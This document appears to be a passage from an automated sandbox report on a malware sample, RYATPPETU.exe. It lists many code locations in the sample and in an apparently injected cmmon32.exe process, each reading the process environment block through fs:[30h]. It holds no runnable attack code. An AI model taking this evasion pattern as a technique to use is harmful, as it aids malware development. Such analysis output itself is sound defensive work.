Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E732073 mov eax, dword ptr fs:[00000030h] 8_2_1E732073
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E741074 mov eax, dword ptr fs:[00000030h] 8_2_1E741074
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69746D mov eax, dword ptr fs:[00000030h] 8_2_1E69746D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h] 8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h] 8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6ABC2C mov eax, dword ptr fs:[00000030h] 8_2_1E6ABC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h] 8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h] 8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E7314FB mov eax, dword ptr fs:[00000030h] 8_2_1E7314FB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748CD6 mov eax, dword ptr fs:[00000030h] 8_2_1E748CD6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B90AF mov eax, dword ptr fs:[00000030h] 8_2_1E6B90AF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov ecx, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679080 mov eax, dword ptr fs:[00000030h] 8_2_1E679080
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h] 8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h] 8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h] 8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h] 8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B3D43 mov eax, dword ptr fs:[00000030h] 8_2_1E6B3D43
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h] 8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h] 8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3540 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3540
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E697D50 mov eax, dword ptr fs:[00000030h] 8_2_1E697D50
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748D34 mov eax, dword ptr fs:[00000030h] 8_2_1E748D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov ecx, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h] 8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h] 8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67AD30 mov eax, dword ptr fs:[00000030h] 8_2_1E67AD30
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E728DF1 mov eax, dword ptr fs:[00000030h] 8_2_1E728DF1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A35A1 mov eax, dword ptr fs:[00000030h] 8_2_1E6A35A1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C182 mov eax, dword ptr fs:[00000030h] 8_2_1E69C182
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AA185 mov eax, dword ptr fs:[00000030h] 8_2_1E6AA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F958EC mov eax, dword ptr fs:[00000030h] 15_2_04F958EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068D34 mov eax, dword ptr fs:[00000030h] 15_2_05068D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0501A537 mov eax, dword ptr fs:[00000030h] 15_2_0501A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013540 mov eax, dword ptr fs:[00000030h] 15_2_05013540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov ecx, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD90AF mov eax, dword ptr fs:[00000030h] 15_2_04FD90AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA849B mov eax, dword ptr fs:[00000030h] 15_2_04FA849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99080 mov eax, dword ptr fs:[00000030h] 15_2_04F99080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB746D mov eax, dword ptr fs:[00000030h] 15_2_04FB746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050169A6 mov eax, dword ptr fs:[00000030h] 15_2_050169A6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h] 15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h] 15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h] 15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h] 15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA44B mov eax, dword ptr fs:[00000030h] 15_2_04FCA44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov ecx, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCBC2C mov eax, dword ptr fs:[00000030h] 15_2_04FCBC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050241E8 mov eax, dword ptr fs:[00000030h] 15_2_050241E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05048DF1 mov eax, dword ptr fs:[00000030h] 15_2_05048DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h] 15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h] 15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h] 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h] 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h] 15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h] 15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC35A1 mov eax, dword ptr fs:[00000030h] 15_2_04FC35A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h] 15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h] 15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2990 mov eax, dword ptr fs:[00000030h] 15_2_04FC2990
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061074 mov eax, dword ptr fs:[00000030h] 15_2_05061074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05052073 mov eax, dword ptr fs:[00000030h] 15_2_05052073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA185 mov eax, dword ptr fs:[00000030h] 15_2_04FCA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC182 mov eax, dword ptr fs:[00000030h] 15_2_04FBC182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h] 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h] 15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h] 15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h] 15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h] 15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h] 15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h] 15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9C962 mov eax, dword ptr fs:[00000030h] 15_2_04F9C962
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB7D50 mov eax, dword ptr fs:[00000030h] 15_2_04FB7D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD3D43 mov eax, dword ptr fs:[00000030h] 15_2_04FD3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h] 15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h] 15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h] 15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h] 15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h] 15_2_04FC4D3B
